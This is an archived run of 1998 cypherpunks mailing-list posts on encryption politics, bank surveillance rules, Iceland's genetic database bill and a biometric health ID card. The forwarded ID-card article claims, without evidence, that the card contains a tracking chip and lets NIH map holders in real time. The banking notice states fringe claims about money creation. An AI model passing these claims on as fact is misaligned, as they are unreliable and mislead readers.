Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stewart, William C (Bill), BNSVC" <billstewart@att.com>
Date: Tue, 29 Dec 1998 11:50:58 +0800
To: cypherpunks@cyberpass.net
Subject: Anti-Crypto CongressCritters - FWD: And you thought it was Larry Flynt . . .
Message-ID: <25683280FF49D2119B480000C0AD59009DCAAE@mo3980po13.ems.att.com>
MIME-Version: 1.0
Content-Type: text/plain




Sigh.  Plus ca change
-----Original Message-----
From: Dave Farber [mailto:farber@cis.upenn.edu] 
Sent: Monday, December 28, 1998 1:20 PM
To: ip-sub-1@majordomo.pobox.com
Subject: IP: And you thought it was Larry Flynt . . .

From: sbaker@steptoe.com

Dave,

I am sending you part of a note we sent to our clients a week or two ago.  I

haven't seen it in the press yet, but after it shows up in IP, the NY Times 
will be more or less irrelevant.

Stewart

From:   Stewart Baker (sbaker@steptoe.com)
    Elizabeth Banker (ebanker@steptoe.com)

The press would have you believe that it was Larry Flynt and his 
million-dollar 
tales of infidelity that caused the unexpected change in House leadership
this 
month, but encryption policy buffs -- paranoid by nature and proud of it -- 
are beginning to focus on another suspect, one with more to gain.  

That's because it is the Federal Bureau of Investigation that looks like the

biggest winner now that Robert Livingston has been replaced by Dennis
Hastert as
odds-on favorite to be Speaker of the House of Representatives.
     
Livingston supported the industry's version of SAFE, the crypto decontrol
bill 
that died in Congress last session.  In contrast, J. Dennis Hastert (R-IL)
has 
shown strong solidarity with the FBI on encryption issues as a member of the

House Commerce Committee.  Indeed, Hastert supported the Oxley-Manton
Amendment 
that would have turned the SAFE Act of 1997 (H. R. 695) into a mandate for 
domestic regulation of encryption.  And when Oxley-Manton was rejected by
the 
Committee in favor of the Markey-White Amendment, Hastert voted against the 
SAFE Act.

..  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stewart, William C (Bill), BNSVC" <billstewart@att.com>
Date: Tue, 29 Dec 1998 12:04:27 +0800
To: cypherpunks@cyberpass.net
Subject: FW: More (and last) on And you thought it was Larry Flynt . . .
Message-ID: <25683280FF49D2119B480000C0AD59009DCAB1@mo3980po13.ems.att.com>
MIME-Version: 1.0
Content-Type: text/plain



More on the same topic

-----Original Message-----
From: Dave Farber [mailto:farber@cis.upenn.edu] 
Sent: Monday, December 28, 1998 3:51 PM
To: ip-sub-1@majordomo.pobox.com
Subject: IP: More (and last) on And you thought it was Larry Flynt . . .


Date: 28 Dec 1998 15:30:58 -0800
X-Sent: 28 Dec 1998 23:30:58 GMT
To: farber@cis.upenn.edu
From: "Joseph C.Pistritto" <jcp@jcphome.com>

On Mon, 28 December 1998, Dave FarberSENT OUT

As attractive as this might be as a conspiracy theory, Flint pretty much
admitted he had the goods in this case (and claims to have similar stuff on
something like 7 or 8 other Republicans and 1 democrat).  He's investing
quite
a lot of his own funds in this particular little enterprise of his.

He's apparently quite pissed off that this one leaked before he was able to
use the content himself.  (after all, as a publisher, the reason you develop
content is to use it in print yourself primarily).  

A more interesting question is how the White House found out about the
material
a few days before it came out.  (which apparently is how Roll Call which ran
the story first got ahold of it).  There have been persistent rumors of a
White House controlled black operation to uh, bring pressure upon, certain
people that are in positions to embarrass the President.  Apparently at
least
some of this sort of activity has gone on for a long time, perhaps since the
President was in Arkansas.  

Whether the FBI would be involved in *that* is an interesting question.  
Somehow
I doubt it, because the risk of public exposure in that situation would be
enormous, and there was already an FBI-related scandal early in this
administration.  Also the Administrator over there is regarded as somewhat
of
a loose cannon by the folks in the White House.  So I kind of suspect the
FBI
would not be involved in White House led black ops.  And I doubt the
military
would be involved either (given this President's relations with them.)  So
the
reports of private detectives and other non-government people spearheading
this
squares with what would be rationally expected.

I think the FBI may merely have either just gotten lucky and dodged a bullet
on this one, -or- they had a deeper cover role in passing the stuff to
Flint's
people (undoubtably private individuals, so evidence, if it existed in FBI
files, could've been fed to someone on the "outside").  Given that no one
knew
that Livingston was going to be in the position he was in till several days
*after* the election, that's reasonably quick response if that is really
what
happened.

Don't believe everything you read in the papers...
  Cheers,
    -jcp-


--
Joseph C. Pistritto                        +1 415 706 7270
Belmont, California                        jcp@jcphome.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 29 Dec 1998 15:33:36 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: More (and last) on And you thought it was Larry Flynt . . .
In-Reply-To: <25683280FF49D2119B480000C0AD59009DCAB1@mo3980po13.ems.att.com>
Message-ID: <000301be32f9$bf3f6140$418195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



This has to be the decade of Sex, so many public figures have been brought down,
one way or another, by it (funny thing I heard on the news from Russia -  that
if they were to discover that Yelsin had had an affair with a young woman, at
least they would know that he was still alive).

Perhaps the effects of all this under-the-covers publicity could convince some
VIPs of the imperative need for un-adulteratedH^H^H^H^Hextremely strong crypto
in theirH^H^H^H^H^ "all our" lives.  At least for some types of communication;
they still haven't figured out how to keep their paramours from telling everyone
about their adventures in wonderland.

I wonder if Stewart Baker was sending out that memo with glee?
And why did he send it to Dave Farber?

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Dec 1998 16:37:29 +0800
To: cypherpunks@cyberpass.net
Subject: [FP] FDIC receives more than 6,000 comments
Message-ID: <199812290802.AAA28199@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: [FP] FDIC receives more than 6,000 comments
Date: Wed, 23 Dec 1998 13:53:27 -0600
To: "ScanThisNews Recipients List" <scan@efga.org>

======================================================================
SCAN THIS NEWS
12/23/98
-----------------------------------------

WorldNetDaily
WEDNESDAY
DECEMBER 23
1998

 BIG BROTHER BANKING
Record response
to 'Know Your Customer'
FDIC receives more than 6,000 comments

http://www.worldnetdaily.com/bluesky_exnews/19981223_xex_record_respo.shtml

By Gabrielle Stevenson
(c) 1998 WorldNetDaily.com

The process for reading comments on the Federal Deposit Insurance
Corporation's "Know Your Customer" proposal has already started because of
the increasing number of responses. At last count, the FDIC had received
6,019 responses to the plan.
The most comments received in the past was 3,498, regarding a 1984 broker
deposit regulation.

"Usually we don't get nearly as many," said the FDIC's David Barr.
"Sometimes we only get a 100 or so, and they can be read relatively quickly
for internal use."

Normally the FDIC doesn't read the responses until the comment period has
ended. This time, however, they are trying to get a head start.

"We are trying to see what people are saying," Barr said. "We have gone
through them at least once so far. We do keep them all in consideration.
That is what this whole process is all about."

The FDIC Know Your Customer plan proposes that all banks, credit unions, and
other financial organizations be required to maintain continuous
surveillance of customer's accounts, and report unusual financial activity
to the FBI and other agencies.

[snip] see WorldNetDaily link above for balance of article.

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Dec 1998 16:33:56 +0800
To: cypherpunks@cyberpass.net
Subject: [FP] National "Know Your Banker" Campaign Kick-off
Message-ID: <199812290802.AAA28213@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: [FP] National "Know Your Banker" Campaign Kick-off
Date: Wed, 23 Dec 1998 19:12:22 -0600
To: "ScanThisNews Recipients List" <scan@efga.org>

======================================================================
SCAN THIS NEWS
12/23/98

National "Know Your Banker" Campaign Kick-off

Following are two combined SCAN notices regarding the "Know Your Customer"
banking proposals, and our own SCAN-proposed "National Know Your Banker"
campaign:

1ST NOTICE: NATIONAL DIRECT DEPOSIT WEEK
The nation's banks are planning to gradually convert everyone over to
electronic banking. A series of campaigns have been planned with the
objective of getting people to sign up for debit-cards, smart-cards, and
direct deposit banking. (Direct Deposit means that you sign an agreement
with your employer to have you paycheck directly deposited into your bank
account electronically.) Total electronic banking will result in a windfall
profit for the banking industry as a whole.

In furtherance of their goal, the week of January 25-29, 1999 has been
designated as "National Direct Deposit Week." That week, banks across the
country will participate in a campaign to condition people to acceptance
electronic "Direct Deposit" banking. According to one promotional piece,
"the Direct Deposit marketing campaign will target employers; financial
institutions; government officials; as well as community, professional, and
civic groups." During the promotional period, banks will offer incentives
for consumers to sign up for Direct Deposit; radio promotions will be aired
in local markets; and financial institutions and corporations will be
encouraged to create similar activities with their customers and/or
employees.

So far public acceptance of electronic banking has been somewhat lackluster.
However, at the upper levels of the world's banking community, the decision
has been made to convert to total electronic banking linked to a global
financial network. The upcoming Direct Deposit campaign is just one small
example of the overall plan. Here's a link for additional information:

Promoting Direct Deposit -- The Public Education Campaign
http://www.ezpay.org/campaign.html


2ND NOTICE: NATIONAL KNOW YOUR BANKER WEEK
SCAN would like to propose that the week of January 25-29, 1999 be declared
National "Know Your Banker Week" to run concurrently with the banking
industry's Direct Deposit campaign. During that week, we encourage EVERYONE
to make a concerted effort to learn as much as you possibly can about your
nation's banking system.

Learn how check clearinghouses are already monitoring every checking
transaction, and how profiling is already being done in that industry. Learn
how credit card companies also currently monitor each purchase and "flag"
suspicious or out-of-character activity.

Find out how money is "created" (according to the Federal Reserve) at your
local bank whenever a loan is "granted." Learn how every single "dollar" is
loaned into circulation - at interest - which means that, at all times, more
money is owed (principle + interest) than has been "created" or loaned out
into the economy. Hence, we as a nation can NEVER again be "solvent;" we
will be perpetually in debt to the bankers; we can never "pay back" more
than has been circulated.
(For explanation, see http://home.hiwaay.net/~becraft/CARDS.html )

Learn about "fractional reserve banking," which by definition means that
only a "fraction" of the public's money can be withdrawn from the system at
any given time without inducing a banking collapse. Learn how bankers use
this "fraction" to "create" more "credit money" which they then "loan" to
you under demand for some real property collateral.

Learn how your money has been gradually debased: silver coins which used to
be made of "precious metal" have been surreptitiously converted to a
substrate of worthless composites sandwiched between two thin layers of
slightly less-worthless "silver colored" nickel to make them resemble the
genuine silver coins. In circulation, they all look the same. But the latter
versions are "worth" about 90% less than the former. Even the lowly penny
has been stuffed with totally valueless zinc leaving only a thin shell of co
pper a few thousandths of an inch thick on the outer surface to fool the
public. Seems to have worked well. Who stole the "precious" material and
substituted the cheap slag? Who profited from the change (pun intended)? Was
your banker a willing participant?

Learn how gold and silver "certificates" which were once redeemable for
warehoused gold and silver coin were substituted with worthless, un-backed
"Federal Reserve Notes" that cannot be redeemed but look exactly like the
redeemable certificates - save for the absence of any "promise to pay." Who
was manning the warehouses when this substitution took place? Your banker
perhaps?

Based on what you learn from the foregoing exercise, decide whether or not
the banking institution's "Know Your Customer" program is being instituted
with YOUR best interest in mind.

Use this "Know Your Banker" campaign to ask your banker to sign a simple
affidavit certifying that your funds WILL ALL BE AVAILABLE for withdrawal
"on demand" come January 1, 2000.

Take the opportunity of the National Know Your Banker Week to learn about
all that your banker has done and is planning to do (for you) as you are
converted to total electronic banking over the next few years. (Remember,
the federal government has already converted to total electronic
transactions, and it can be fairly anticipated that soon all employers will
be compelled to make employee payrolls using direct deposit so that payroll
tax payments can be collected electronically.)

Most importantly, take the opportunity of the "National Know Your Banker
Week" to file a comment with any or all of the four agencies that have
submitted "Know Your Customer" proposals.

After the upcoming holiday period, we will provide all the necessary contact
information along with a selection of sample "letters of objection" so that
everyone can easily take part in this campaign. We will also provide
material which will reveal that, in reality, under our current system of
"fiat money," ALL banking activity IS "money laundering" engaged in BY THE
BANKERS. Looking forward to your participation.

Happy holidays,

Scott
---------------------------------------------------------
Complete detailed information on all four of the proposed Know Your Customer
regulations can be found at:
http://www.networkusa.org/fingerprint.shtml

See these important links to learn more about how money is created.
http://home.hiwaay.net/~becraft/MONEYbrief.html

http://home.hiwaay.net/~becraft/FRENEAUbanking.html

http://home.hiwaay.net/~becraft/FSanders.htm

Franklin Sanders - "The Money Changer"
http://www.the-moneychanger.com/
---------------------------------------------------------
Promoting Direct Deposit -- The Public Education Campaign
[From the pages of the New York Clearing House Association]
http://www.ezpay.org/campaign.html


Campaign Goal: The goal of our campaign is to increase Direct Deposit use
among consumers by 5 percent each year for the next five years.

Campaign Activities: The Direct Deposit marketing campaign will reach
employers, financial institutions, government officials and community,
professional and civic groups. In addition, January 25-29, 1999 has been
declared "Direct Deposit Week" -- an opportunity to spur excitement through
incentives for consumers to sign up for Direct Deposit. Radio promotions
will take place in local markets, and financial institutions and
corporations are encouraged to create similar activities with their
customers and/or employees.

Campaign Success

  Over the past two years, Direct Deposit enrollment has
  increased by over 540,000 employees.

Outreach to Employers: Top 1,000+ Employers (Fall 1998)

  Direct mailing to solicit interest among Payroll Managers
  throughout New York, New Jersey, Connecticut, Puerto Rico
  and the U.S. Virgin Islands

  Kick-off luncheons in September/October 1998 -- New York
  City, Long Island, Rochester, and New Jersey

  Catalog of promotional materials, offered at cost, for
  interested employers

  A Guide to Increasing Direct Deposit Participation [link]

  A Guide to Implementing Direct Deposit [link]

Outreach to Financial Institutions (Fall 1998)

  Catalog of promotional materials, offered at cost, for
  banks' use with retail customers

  "How to Guide" for promoting Direct Deposit to retail
  customers

  Media announcement to banking trade publications, general
  business media

Grassroots Outreach (Fall 1998)

Mailing of information and materials to community, labor unions,
professional associations, women's/men's groups, minority associations,
fraternal groups and civic groups.

Promotional Events and Media Relations (Winter 1999)

  Direct Deposit Week (January 25-29, 1999)

  Radio Promotion -- Call-in contest to answer "What is the
  most impulsive thing you've ever spent your paycheck on?"
  Winners to receive equivalent of one week's pay via Direct
  Deposit (up to $1,000).

  Media Relations -- Outreach to print and broadcast news
  media, both general interest (daily newspapers, local radio
  and television) and trade (payroll publications, banking
  trades); release of research survey results.

  Branch/Company Activities -- Financial institutions and
  company activities, incentives and events to celebrate Direct
  Deposit Week e.g. free/discounted services, giveaways of
  promotional items, free concert tickets or other prizes for
  100th customer to sign-up, contest/quiz with week's pay as
  prize.

We welcome your thoughts, ideas and recommendations on making the Direct
Deposit Campaign a success. Please direct any questions or comments to
Rossana Czelusniak or Kathy Loy at (212) 613-0166.

--------------------------------------------------
http://www.nyclearinghouse.org/Welcome.html

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Dec 1998 16:48:29 +0800
To: cypherpunks@cyberpass.net
Subject: [FP] FW: GE - Icelandic DNA database
Message-ID: <199812290802.AAA28224@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: [FP] FW: GE - Icelandic DNA database
Date: Mon, 28 Dec 1998 20:00:29 -0600
To: "ScanThisNews Recipients List" <scan@efga.org>

======================================================================
SCAN THIS NEWS
12/28/98

[Forwarded by request]

  -----Original Message-----

From: Wolf [mailto:Fenris@reality8.demon.co.uk]
Subject: GE - Icelandic DNA database

This is from the genetics mail list. Can you help to circulate as they
are asking for foreign intervention in the form of an e-mail campaign?
I suspect that once governments can point to one country that has this
sort of database in place it will be used as an example of what the rest
of us should be aiming at...ycchhhh!!!

  ------- Forwarded message follows -------

From: genetics <genetics@gn.apc.org> (by way of genetics
<genetics@gn.apc.org>)
Subject: GE - Icelandic DNA database

From: Herbert Mehrtens <h.mehrtens@tu-bs.de>

>HELP PREVENT A BIOTECHNOLOGICAL DISASTER!!!!!
>
>The controversial health database bill has been passed in
>the Icelandic parliament. It was approved by a vote of
>37 in favor, 20 saying no, and 6 MPs absent. Before the
>bill becomes a law it must be signed by the President of
>Iceland, Mr. Olafur Ragnar Grimsson.
>
>Several wide-ranging changes were made to the bill in
>the last few days. Personal protection was decreased by
>stating specifically that the licensee use unencrypted
>health data. Even more blatant is the new provision in
>the bill that the database contain genetic information.
>Formerly it was to contain only health information from
>hospital charts and doctors records.
>
>For those who have been following the discussion,
>it will be of interest to know that the bill is in
>fact now a new bill--a result of the collusion between
>the Ministry of Health, the government and deCODE
>--and the database has now become the Icelandic DNA
>-collection bill or the pharmacogenetic wonderland
>bill instead of a health database bill (see also letter by
>Bogi Andersen to the editor, Science, Dec. 11, 1998,
>p. 1993).
>
>If there was any doubt as to whether an individual will be
>personally identifiable, now it is certain that every
>person can be traced, either individually or through
>pedigrees, by using genetic tracers or DNA sequences,
>in the near future. The consequences of including
>genetic information are momentous. Therefore:
>
>1. The database bill should not be made a law nor
>should it be implemented, because of ethical, privacy,
>consumer and human rights concerns.
>
>2. If there is to be a health/genetic database in spite of
>these concerns, informed consent and independent
>ethical review committees are minimum requirements.
>
>The Icelandic Research Council which supported the bill
>has abruptly withdrawn its support following an emergency
>meeting on Dec. 14 because of the inclusion of genetic data
>in the proposed database and infraction of free scientific
>research.
>
>Likewise, the former President of Iceland, Mrs. Vigdis
>Finnbogadottir, who sat on the Board of deCODE has
>resigned due to conflict with her role as President of
>UNESCO's World Commission on Scientific Knowledge
>and Technology.
>
>For further details please refer to the website of Mannvernd,
>the Icelandic Association for Ethics in Science and Medicine,
>for news update in English. Also consult a graphical presentation
>of the views of over 50 agencies and experts which submitted
>highly critical opinions to the Health Committee of Althing as
>the 2nd version of the bill was debated this fall; to no avail
>as these opinions were callously ignored by the government
>majority on the Health Committee:
>
><http://www.simnet.is/mannvernd/english/articles/03.12.1998_summary_of_opi
nio>http://www.simnet.is/mannvernd/english/articles/03.12.1998_summary_of_op
inio
>ns.html
>
>Also see the associations' English language home page:
>
><http://www.simnet.is/mannvernd/english/index.html>http://www.simnet.is/ma
nnvernd/english/index.html
>
>deCODE's representatives have unsuccessfully
>tried to rebuke our information in the internet news
>discussion groups. Thanks to DENDRITE's David Oaks
>and others this has been answered in an informed and
>decisive manner.
>
>deCODE's statement that personal information will be
>anonymous is false. Anonymous means that names and ID's
>have been eliminated. The database will include ID's
>that, although encrypted, can be used to trace individuals,
>as explained by encryption expert Ross Andersons' report:
>
><http://www.cl.cam.ac.uk/~rja14/iceland/iceland.html>http://www.cl.cam.ac.
uk/~rja14/iceland/iceland.html
>
>Most experts consider the database information personally
>identifiable, which means that informed consent should be
>sought, according to international ethical standards. These
>concerns become magnified once genetic data is included.
>
>An ethical committee was introduced in the latest version of
>the bill. Yet it is not specified who shall sit on the committee
>and it is strongly suspected that the Minister of Health will
>appoint the licensees' representative on the committee. Moreover,
>that provision speaks volume for the fact that the government
>does not want to recognize the irreducible bond between consent
>(informed or otherwise) and ethics committees. By passing the
>law the government violates sound principles of scientific ethics
>and human rights.
>
>Also, parliamentary majority spokesmen have dicussed the
>possibility of including prescription information from
>drug stores in the database! This is not specified in the bill
>but could be in later revisions, according to newspapers
>supporting the government. This would be similar to turning
>a gold mine into a diamond mine.
>
>The Icelandic database bill has been considered by numerous
>foreign experts (see opinions on Mannvernd's website) and
>is considered in the Economist (Dec. 5-12, 1998) and New Scientist
>(Dec. 5th, 1998) to set a precedent of how medical and genetic
>databases in other countries could be constructed and misused in
>the future.
>
>This biotechnological disaster in the making is of international
>concern and importance. We consider ourselves being on the
>outpost of this battle for users' rights in new genetic research
>and important biotechnology developments and we need all
>the support we can get.
>
>We are grateful for any help we can get. Although the bill
>was passed by the parliament on Dec. 17, it needs to be signed
>by the President, whereafter much work needs to be done, regulations
>written, agreements made with the licensee etc.
>
>Foreign intervention at this moment may have a crucial
>effect upon future course of events.
>
>Please write letters of concern/protest to
>
>Prime Minister Mr. David Oddsson,
>Stjornarradshusinu
>Laekjatorg
>Reykjavik
>Iceland
>
>E-mail: postur@for.stjr.is
>Fax: 00354+562 4014
>
>and
>
>Minister of Health Ms. Ingibjorg Palmadottir
>Arnarhvoli
>Reykjavik
>Iceland
>
>E-mail: postur@htr.stjr.is
>Fax: 00354+551 9165
>
>
>with a copy to Mannvernd,
>
>yours sincerely,
>
>Petur Hauksson, chairman
>Icelandic Mental Health Alliance (Gedhjalp)
>Tryggvagotu 9
>101 Reykjavik
>Iceland
>
>peturh@itn.is
>gedhjalp@isholf.is

  ----------------(-x?)nS(r7A)------------------

Fenris Wolf

http://members.xoom.com/Astraea/CAPACS.htm
http://members.xoom.com/Astraea/RSPCAhelp.htm
http://www.marketersworld.com/members/Fenris/

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Dec 1998 16:41:06 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: Biometric National ID Card Being issued NOW and used to track people
Message-ID: <199812290802.AAA28235@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: USCMike1@aol.com
Subject: SNET: Biometric National ID Card Being issued NOW and used to track people
Date: Mon, 28 Dec 1998 15:03:04 EST
To: KatieSouix@aol.com


->  SNETNEWS  Mailing List

This is a multi-part message in MIME format.

--part0_914875392_boundary
Content-ID: <0_914875392@inet_out.mail.aol.com.1>
Content-type: text/plain; charset=US-ASCII


--part0_914875392_boundary
Content-ID: <0_914875392@inet_out.mail.netdoor.com.2>
Content-type: message/rfc822
Content-transfer-encoding: 7bit
Content-disposition: inline

Return-Path: <kepi@netdoor.com>
Received: from  rly-zd01.mx.aol.com (rly-zd01.mail.aol.com [172.31.33.225]) by
	air-zd01.mail.aol.com (v53.27) with SMTP; Mon, 14 Dec 1998 18:14:48
	-0500
Received: from netdoor.com (netdoor.com [208.137.128.6])
	  by rly-zd01.mx.aol.com (8.8.8/8.8.5/AOL-4.0.0)
	  with ESMTP id SAA21775;
	  Mon, 14 Dec 1998 18:14:44 -0500 (EST)
Received: from kepi (port579.hat.netdoor.com [208.148.200.179])
	by netdoor.com (8.9.1/8.9.1) with SMTP id RAA06191;
	Mon, 14 Dec 1998 17:13:32 -0600 (CST)
Message-Id: <3.0.5.32.19981214171416.007cbb30@mail.netdoor.com>
X-Sender: kepi@mail.netdoor.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Mon, 14 Dec 1998 17:14:16 -0600
To: Kepi <kepi@netdoor.com>
From: Kepi <kepi@netdoor.com>
Subject: [FP] Biometric National ID Card Now A Reality
Mime-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit

This is an important post that I feel needs circulating.  Should this be a
a duplicate for some of my listees, please disregard.  Kepi <><
-------------------------------------------------------------

>From: "ScanThisNews" <mcdonalds@airnet.net>
>To: "ScanThisNews Recipients List" <scan@efga.org>
>Subject: [FP] Biometric National ID Card Now A Reality
>Date: Sun, 13 Dec 1998 19:13:18 -0600
>X-MSMail-Priority: Normal
>X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
>X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
>Importance: Normal
>Sender: owner-scan@efga.org
>Reply-To: owner-scan@efga.org
>X-Web-Site: http://www.efga.org/
>X-Mail-List-Info: http://efga.org/about/maillist/
>X-SCAN: http://www.networkusa.org/fingerprint.shtml
>
>======================================================================
>SCAN THIS NEWS
>12/13/98
>
>[forwarded from Larry Becraft]
>THE BIOMETRIC NATIONAL ID CARD IS NOW A REALITY...
>By Jon Christian Ryter
>Author of WHATEVER HAPPENED TO AMERICA?
>and THE BAFFLED CHRISTIAN'S HANDBOOK
>
>America was rightfully alarmed in late September when Representatives Bob
>Barr (R-GA) and Ron Paul (TX) revealed the fact that somehow, unbeknown to
>anyone, and for some as yet unexplained reason, the National ID Card that
>Hillary Clinton, Marc Tucker and Ira Magaziner had adroitly concealed in the
>failed Health Security Act of 1994 had somehow "accidentally" been passed,
>in a somewhat illegal and unconstitutional fashion, and was now "the law of
>the land."
>
>Pictured (see link below) is the actual "Healthcare Passport" card currently
>being used in three American cities. Displayed is the front and back of that
>card. This photo was scanned from the brochure used by the National
>Institute of Health to introduce the new card in a seminar in Denver earlier
>this year. The word "passport" on the card had to have been a
>tongue-in-cheek addition, since it is the precursor of the internal passport
>that will ultimately control your ability to move freely throughout this
>great land. The card is biometric. Stored on this card is the complete
>medical history of the card's owner. Also stored on the card is every
>conceivable piece of information about that person. Imbedded in the card is
>a tracking devise.
>
>The plan to create and implement a National ID Card, while first made
>"public" in a private White House meeting on Nov. 11, 1993 and discussed in
>a disavowed protocol that detailed the dialogue of that meeting, is not
>uniquely a Clintonoid idea even though the National ID Card first appears
>innocuously concealed in the Health Security Act as a "healthcare benefits
>card" that the First Lady insisted had to be carried by every American--even
>if they refused to be covered by the plan--under penalty of law.
>
>	The same card, in the form of a national driver's license, had just been
>mandated by the European Union for all of the new European States. A brief
>battle waged in Europe over the national driver's license. Most Europeans
>had experienced national identity cards in the past and realized quickly the
>new universal European driver's license was an internal passport that would
>give their new government the tool they needed to control their lives. The
>media immediately labeled those who resisted the EU driver's license as
>"globalphobes" who were against progress, and wanted to return Europe to the
>days of the cold war. They were the extremists.
>
>	In the United States, the Clinton's knew a National ID Card spelled
>problems,
>regardless what name was put on it. However, as a healthcare card that
>provided each American with thousands of dollars of free medical care, they
>correctly surmised that the ramblings of the right wing zealots could be
>easily dismissed by the mainstream liberal media. The media did its job
>well.
>
>The Health Security Act was the best thing since sliced bread and peanut
>butter. According to the media, the Health Security Act would provide
>healthcare for the millions upon millions of uninsured Americans. The media
>even obliged by ignoring the obviously flawed cost assessments as well.
>
>Hillary demanded that Congress pass the Health Security Act without and
>changes--reminiscent of FDR's passing the "emergency legislation" that
>kicked off the New Deal without allowing members of Congress to even see the
>legislation they were voting on--and unconstitutionally granting Roosevelt
>almost dictatorial power over the United States. Congress wasn't buying.
>They read the Health Security Act. Then, they rejected it. It was, they
>declared, the most expensive social experiment in the world.
>
>Buried in the National Archives, in the working papers of the Hillary
>Clinton healthcare plan, was a game plan in the event the Health Security
>Act went down in flaming defeat. The game plan?  Implement another
>healthcare act that provided healthcare for children.  No one would dare
>deny healthcare to children. To introduce the plan, they called on Teddy
>Kennedy. Kennedy failed. Kennedy, they realized, was trusted by most
>Americans even less than the Clintons.
>
>Next they turned to Orrin Hatch, who teamed up with Kennedy and rammed the
>legislation through Congress. Healthcare for kids. Of course, everyone was
>in favor of it. Voting against it was a good way to lose an election. And,
>once the law was codified, the bureaucracy possessed the authority to simply
>expand it to include anyone and everyone.
>
>What was not in the legislation was funding to create a biometric health
>care card. The authority to do it was there, but not the money. For the
>money, the Clinton administration turned to the Robert Wood Johnson
>Foundation. The foundation, created by the founder of Johnson & Johnson,
>obliged and funded the experimental program which was kicked off in three
>western cities (noted above).
>
>What was introduced to members of the National Institute of Health in Denver
>as a card that will record the inoculation records of children, includes
>everything from DNA typing to that individual's medical, psychiatric and
>financial history. It was because the biometric card would also contain the
>psychiatric history of the cardholder that an employee of the National
>Institute of Health approached me and offered me the data that is contained
>in this report.
>
>In my initial meeting with the NIH employee, I was also told that this
>person had commented to a NIH executive that it was not good for the card to
>contain so much personal information that was not needed to monitor the
>rates of inoculation of the children covered by the program, since it would
>provide the government information that could easily be misused.
>
>At that point the NIH executive laughed and said: "What do you think we have
>do with the data we get from Medicare and Medicaid? We've been using it for
>years to apprehend and deport illegal aliens and to capture those wanted by
>the law."
>
>In the case of the Health Passport, which is the precursor of the National
>Driver's License that will go into affect nationwide on October 1, 2000,
>however, the is one added feature--it contains a tracking chip.
>
>At a recent National Institute of Health seminar, an NIH executive proudly
>displayed an electronic map created by the NIH computer technicians that
>pinpointed every Health Passport card holder in Denver, Colorado. It was a
>"living map" that would track each Health Passport card holder if and when
>they moved. Whether or not such a map had been created for the other two
>"pilot" cities is not known.
>
>NOTE: Before I left Washington this afternoon, I spoke for about a half hour
>with Stan Johnson of the Prophecy Club, and emailed Stan a copy of the Heath
>Passport Card. Stan has additional information on this subject, particularly
>with respect to a new computer mainframe that the government recently
>installed in Denver that ties in with the information I have been receiving
>from my own source in the National Institute of Health. Apparently this is
>the planned topic for the Prophecy Club's radio talk show next Monday (and
>because it is, I will not reveal any of the revelations that Stan shared
>with me on the phone this afternoon. I would strongly urge you to visit
>Stan's website for additional information.
>
>http://www.prophecyclub.com/
>
>---------------------------------------------
>http://www.westgov.org/hpp/hpp-web.htm
>
>HEALTH PASSPORT
>
>A Project of the Western Governors' Association
